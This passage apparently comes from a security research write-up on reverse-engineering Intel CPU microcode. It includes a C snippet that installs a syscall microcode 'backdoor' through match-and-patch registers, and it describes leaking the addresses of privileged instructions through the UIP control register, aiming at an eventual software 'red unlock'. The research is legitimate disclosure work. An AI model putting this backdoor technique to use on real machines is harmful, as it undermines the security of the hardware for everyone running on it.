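Because the offset of rsi within its page is at most 0xfff, rsi + 0x100 is at most 0x10ff past the aligned base, so the entry point always falls inside the two pages being remapped. This says nothing about how far the data after the entry point may extend.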

Now, with the in side effect gone and the above microcode patch, we can finally place the backdoor using the following C code:


void do_syscall_patch() {

#include "ucode/syscall.h" // code from above

    patch_ucode(addr, ucode_patch, ARRAY_SZ(ucode_patch));

    hook_match_and_patch(0x12, hook_address, addr);

    hook_match_and_patch(0x13, 0x02e4, addr+0x24);

}

We use 0x12 as our first match & patch register, as the ones below it are already allocated for actual bug fixes by Intel, and Chrome will nuke the CPU after a couple of seconds if we don’t keep these patches alive. We are still not sure of the root cause, but have narrowed it down to patch 0x8 being the critical one.

The entire code can be found in our repo, and the demo in the presentation from Def Con 31.

Reversing Macro Instructions

Now with a backdoor in place, what’s left to do?

Well, we have seen Chrome crash due to bugs in the CPU. What if we could develop exploits for the CPU itself, and with what goal?

If we could somehow gain control of the uip, it could be possible to redirect microcode control flow to the debug instructions and, as such, do a red unlock from software.

As we have shown with syscall, we used the documentation as well as the pseudocode from the Intel manual as a reference implementation while reversing. Another very neat trick is watching changes in the control register bus. As mentioned, the control register bus contains information shared between logic units.

In the control register bus, we find the two registers CORE_CR_CUR_RIP and CORE_CR_CUR_UIP at 0x67 and 0x68, respectively. An interesting observation about the UIP register is that it is updated after executing the instruction. This fact can be abused to backtrace entire macro instructions.

Let’s say we want to find the xlat for swapgs. We can put a hook on generate_#GP and run MOVEFROMCREG_DSZ64_D(RAX, CORE_CR_CUR_UIP) as the first instruction after the hook. Now rax will contain the address executed before jumping to generate_#GP, which leaks the address of the last privileged macro instruction we executed from user-space. So if we run swapgs after placing this hook, we will leak its address. In labels.txt we have documented all the xlats we have found so far.
